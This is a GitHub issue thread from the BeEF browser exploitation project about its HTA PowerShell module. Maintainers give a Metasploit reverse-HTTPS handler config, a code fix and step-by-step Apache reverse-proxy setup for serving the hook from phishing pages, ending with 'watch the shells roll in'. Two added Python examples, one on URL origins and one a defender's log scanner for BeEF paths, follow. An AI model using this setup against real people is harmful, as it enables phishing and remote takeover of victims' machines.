beefproject / beef

The Browser Exploitation Framework Project
https://beefproject.com

HTA_Powershell does not popup in IE #1072

Closed zeknox closed 9 years ago

zeknox commented 10 years ago

The HTA popup message does not appear to be working in either version of IE-10 or IE-11. Beef seems to send the proper payload to the browser, but a popup is never shown to the user. Something I'm missing?

My beef instance is fully updated and running ruby 1.9.3

[ 0:53:20][*] Autorun executed[hta_powershell] against Hooked browser [id:1, ip:192.168.1.2, type:IE-11, os:Windows 7]
[ 0:53:24][*] Hooked browser [id:1, ip:192.168.1.2] has been sent instructions from command module [id:1, name:'HTA PowerShell']
[ 0:53:29][*] Hooked browser [id:1, ip:192.168.1.2] has executed instructions from command module [id:1, name:'HTA PowerShell']
[ 0:54:01][*] New Hooked Browser [id:2, ip:192.168.1.2, type:IE-10, os:Windows 7], hooked domain [sub.issds.com:80]
[ 0:54:01][*] Autorun executed[hta_powershell] against Hooked browser [id:2, ip:192.168.1.2, type:IE-10, os:Windows 7]
[ 0:54:06][*] Hooked browser [id:2, ip:192.168.1.2] has been sent instructions from command module [id:2, name:'HTA PowerShell']
[ 0:54:11][*] Hooked browser [id:2, ip:192.168.1.2] has executed instructions from command module [id:2, name:'HTA PowerShell']

antisnatchor commented 10 years ago

I've changed the hta_powershell module in BeEF. Now instead of configuring MSF handler and other options in the module config, you must specify this stuff in extensions/social_engineering/config.yaml

powershell:
    # the default payload being used is windows/meterpreter/reverse_https
    msf_reverse_handler_host: "127.0.0.1"
    msf_reverse_handler_port: "443"
    powershell_handler_url: "/ps"

wadealcorn commented 9 years ago

Can this be closed?

antisnatchor commented 9 years ago

I will leave this open so I can do some more testing on IE <= 9. On IE 10/11 it works properly for me.

NOTE: beef.http.host (or beef.http.public if you use BeEF behind mod_proxy or an equivalent reverse proxy) needs to have the public IP. The HTA attack will not work if you leave beef.http.host set to 0.0.0.0.

7h3kid commented 9 years ago

I've run into the same issue as zeknox. When using the BeEF HTA attack with phishing-frenzy, the attack hangs at the same place for me. When looking at the attack in Burp I see that the /ps/hta GET request is made to the landing page on port 80 instead of port 3000, where the attack is actually being served. In my testing I get the demos/basic.html demo site on port 3000 to work fine with the HTA attack, but when I'm hooking a browser via a landing page running on port 80 the /ps/hta request gets a 404.

wadealcorn commented 9 years ago

Thanks @zeknox. Sounds like something has been hardcoded. @antisnatchor are you able to check?

antisnatchor commented 9 years ago

Are you sure you're following what I said in the comment above?

NOTE: beef.http.host (or beef.http.public if you use BeEF behind mod_proxy or an equivalent reverse proxy) needs to have the public IP of the machine where you're running BeEF, meaning that it should list only one interface (and not 2/3, as BeEF auto-binds to every interface if you leave 0.0.0.0). The HTA attack will not work if you leave beef.http.host set to 0.0.0.0.

Works great for me on IE10 and IE11 and I get a reverse shell immediately.

antisnatchor commented 9 years ago

Another thing to note is that if you are adding BeEF to a landing page served by PhishingFrenzy, it sounds like you're using different origins (as you run on different ports).

Check my phishing-frenzy fork on Github (not merged in the original master yet, find it here: https://github.com/antisnatchor/phishing-frenzy), I'm using mod_proxy with Apache in order to have BeEF listen on 127.0.0.1:8080 and Apache serving phishing pages and also proxying requests to /hook.js (or in this case /ps/hta) to BeEF. This integration is a WIP, and some of the stuff such as the HTA attack is still not public. In this way both the phishing page and the BeEF hook are in fact same-origin, which is better for many attacks.

While you might wait for this to be public, I guess you can just change in modules/social_engineering/hta_powershell/command.js the 'hta_url' variable to:

var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta';

That should work, although there are different ports involved, which is never ideal. Let me know.
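
Why the request lands on the wrong port, as an added example that is neither part of this thread nor BeEF's own code: the snippet resolves hta_url against the hooked page's origin the way a browser does, and encodes the beef.http.host / beef.http.public rule from the comment above. It assumes (the thread implies but does not say outright) that the earlier module requested ps_url + '/hta' as a relative URL; www.example.com, port 3000 and the config dicts are constructed values.

```python
"""Added example for this thread (not BeEF project code): where the browser
actually sends the /ps/hta request, depending on how hta_url is built and on
the beef.http settings. Assumption, not stated verbatim in the thread: before
the command.js change the module requested ps_url + '/hta' as a relative URL,
so the browser resolved it against the hooked page's own origin."""
from urllib.parse import urljoin, urlsplit


def beef_domain(http_cfg: dict) -> str:
    """Base URL BeEF advertises to hooked browsers, following the rule given in
    the thread: beef.http.public (+ public_port) when BeEF sits behind a
    reverse proxy, otherwise beef.http.host:port. 0.0.0.0 is a bind address,
    not something a remote browser can connect to, so it is rejected."""
    if http_cfg.get("public"):
        host, port = http_cfg["public"], str(http_cfg.get("public_port", "80"))
    else:
        host, port = http_cfg.get("host", ""), str(http_cfg.get("port", "3000"))
    if host in ("", "0.0.0.0"):
        raise ValueError("beef.http.host must be the public IP/hostname, not 0.0.0.0")
    return f"http://{host}" if port == "80" else f"http://{host}:{port}"


def hta_url(http_cfg: dict, ps_url: str = "/ps", absolute: bool = True) -> str:
    """hta_url as command.js builds it after the change quoted in the thread
    ('<%= @domain %>' + '<%= @ps_url %>' + '/hta'); absolute=False gives the
    relative form assumed for the earlier module."""
    path = ps_url + "/hta"
    return beef_domain(http_cfg) + path if absolute else path


def request_origin(page_url: str, url: str) -> str:
    """Origin (scheme://host:port) the browser connects to for `url` once it
    is resolved against the page the hook is running in."""
    parts = urlsplit(urljoin(page_url, url))
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return f"{parts.scheme}://{parts.hostname}:{port}"


def same_origin(page_url: str, url: str) -> bool:
    """True when the request stays on the hooked page's origin (the layout the
    mod_proxy setup described later in the thread achieves)."""
    return request_origin(page_url, url) == request_origin(page_url, page_url)


if __name__ == "__main__":
    # constructed values: a phishing page on port 80, BeEF on port 3000 or proxied
    page = "http://www.example.com/landing.html"
    direct = {"host": "www.example.com", "port": "3000"}
    proxied = {"host": "localhost", "port": "8080",
               "public": "www.example.com", "public_port": "80"}
    rel = hta_url(direct, absolute=False)
    # relative form: the browser asks the phishing site on :80, which answers 404
    print("relative:", rel, "->", request_origin(page, rel))
    print("absolute:", hta_url(direct), "->", request_origin(page, hta_url(direct)))
    print("proxied :", hta_url(proxied), "same origin:", same_origin(page, hta_url(proxied)))
    try:
        beef_domain({"host": "0.0.0.0", "port": "3000"})
    except ValueError as e:
        print("0.0.0.0 :", e)
```

The relative form is resolved against the landing page, so with the page on port 80 and BeEF on port 3000 the request never reaches BeEF; the absolute form fixes the target but is still cross-origin, and only the reverse-proxy layout (public set, host bound to loopback) keeps everything on one origin.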

antisnatchor commented 9 years ago

As expected this IS WORKING with the same approach I mentioned above and implemented in my PF fork.

See reply from Chris Cuevas with detailed steps if you don't want to use my PF fork (this stuff will be merged soon in the PF master anyway):

Here are the additional steps I had to put in place on a Kali Linux VM to integrate BeEF and phishing-frenzy using mod_proxy as a reverse proxy. I'm certain this could be done more elegantly, but this worked for my immediate needs. I'll also mention the evasion techniques within BeEF work amazingly well.

  1. Install mod_proxy

apt-get install -y libapache2-mod-proxy-html libxml2-dev

  2. Enable mod_proxy

a2enmod proxy
a2enmod proxy_http
a2enmod proxy_ajp
a2enmod rewrite
a2enmod deflate
a2enmod headers
a2enmod proxy_balancer
a2enmod proxy_connect
a2enmod proxy_html

  3. Config vhost to use mod_proxy (I just modified 1.conf with the following) (the ui portion is optional)

ProxyRequests Off
ProxyPreserveHost On

ProxyPass /bh.js http://127.0.0.1:8080/bh.js
ProxyPassReverse /bh.js http://127.0.0.1:8080/bh.js
ProxyPass /dh http://127.0.0.1:8080/dh
ProxyPassReverse /dh http://127.0.0.1:8080/dh
ProxyPass /ps http://127.0.0.1:8080/ps
ProxyPassReverse /ps http://127.0.0.1:8080/ps
ProxyPass /ui http://127.0.0.1:8080/ui
ProxyPassReverse /ui http://127.0.0.1:8080/ui

<Location /ui>
    Order allow,deny
    Allow from all
</Location>

<Files /bh.js>
    Order allow,deny
    Allow from all
</Files>

<Files /dh>
    Order allow,deny
    Allow from all
</Files>

<Location /ps>
    Order allow,deny
    Allow from all
</Location>

  4. Configure BeEF to be proxy aware (edit beef/config.yaml and change...)

host: "localhost" # Bind to loopback server
port: "8080" # Port on 127.0.0.1

public: "www.example.com" # Public site
public_port: "80" # Public port

  5. In modules/social_engineering/hta_powershell/command.js, change the 'hta_url' variable to:

var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta';

  6. I had to hard-code the landing page URL in modules/social_engineering/hta_powershell/module.rb

{'name' => 'domain', 'ui_label' => 'Serving Domain (BeEF server)', 'value' => "http://www.example.com"},

  7. Kick campaign and watch the shells roll in

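
From the other side of the wire: with the mod_proxy layout above, a hooked browser fetches the hook script, posts to /dh and then GETs /ps/hta on the phishing site's own origin, so those requests are what a web gateway or proxy log on the victim network would record. The following added example (not from the thread or the BeEF project) scans constructed Apache combined-format log lines for the endpoints named in this thread and flags clients that completed the hook-then-HTA sequence. The labels for /dh and /ps are taken from how the thread uses them; path names are operator-configurable, so treat the table as a template for the names you know about.

```python
"""Added example (not BeEF project code): a defender-side scan of HTTP request
logs for the BeEF endpoints that appear in this thread's proxy setup. The
sample lines below are constructed, in Apache combined log format."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Paths taken from the thread. BeEF lets the operator rename these (the thread
# itself uses /bh.js rather than the default /hook.js), so a path rule only
# catches names you already know; order matters because matching is by prefix.
BEEF_PATHS = {
    "/hook.js": "hook script",
    "/bh.js": "hook script (renamed)",
    "/ps/hta": "HTA PowerShell landing page",
    "/ps": "powershell handler url",
    "/dh": "handler proxied to BeEF in the thread's setup",
    "/ui": "admin UI",
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)

# constructed sample: one hooked IE client and one unrelated scanner
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2015:00:53:20 +0000] "GET /landing.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0)"
10.0.0.5 - - [10/Oct/2015:00:53:21 +0000] "GET /bh.js HTTP/1.1" 200 98213 "http://www.example.com/landing.html" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0)"
10.0.0.5 - - [10/Oct/2015:00:53:22 +0000] "POST /dh HTTP/1.1" 200 0 "http://www.example.com/landing.html" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0)"
10.0.0.5 - - [10/Oct/2015:00:53:29 +0000] "GET /ps/hta HTTP/1.1" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0)"
10.0.0.9 - - [10/Oct/2015:00:55:00 +0000] "GET /index.html HTTP/1.1" 200 300 "-" "curl/7.38.0"
10.0.0.9 - - [10/Oct/2015:00:55:02 +0000] "GET /ps/hta HTTP/1.1" 404 209 "-" "curl/7.38.0"
"""


def parse_line(line: str):
    """Parse one combined-format line; returns None for lines that do not match.
    Forward-proxy logs carry absolute URLs, web-server logs carry paths; both
    are reduced to the path without query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    path = urlsplit(target).path if target.startswith("http") else target.split("?", 1)[0]
    return {"ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
            "path": path, "status": int(m.group("status"))}


def classify(path: str):
    """Label for a known BeEF path (exact match or a sub-path of it), else None."""
    for known, label in BEEF_PATHS.items():
        if path == known or path.startswith(known + "/"):
            return label
    return None


def scan(lines):
    """Group matching requests by client IP: {ip: [(ts, path, label, status), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec["path"])
        if label:
            hits[rec["ip"]].append((rec["ts"], rec["path"], label, rec["status"]))
    return dict(hits)


def hta_delivery_clients(hits):
    """Clients that successfully loaded a hook script and then the HTA landing
    page: the sequence the BeEF console log in the first post shows from the
    attacker's side."""
    flagged = []
    for ip, events in hits.items():
        hooked = False
        for _ts, path, label, status in events:  # events are in log order
            if label.startswith("hook script") and status == 200:
                hooked = True
            elif hooked and path == "/ps/hta" and status == 200:
                flagged.append(ip)
                break
    return sorted(flagged)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG.splitlines())
    for ip, events in hits.items():
        for ts, path, label, status in events:
            print(f"{ip} {ts} {status} {path}  <- {label}")
    print("hook + HTA delivery observed from:", hta_delivery_clients(hits))
```

The unrelated client that only probes /ps/hta and gets a 404 is listed as a hit but not flagged, because the rule requires a successful hook-script load first; a 200 on the landing page after the hook is the point at which the HTA has reached the browser.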
antisnatchor commented 9 years ago

This can be closed now, please use this as a reference for now ;-)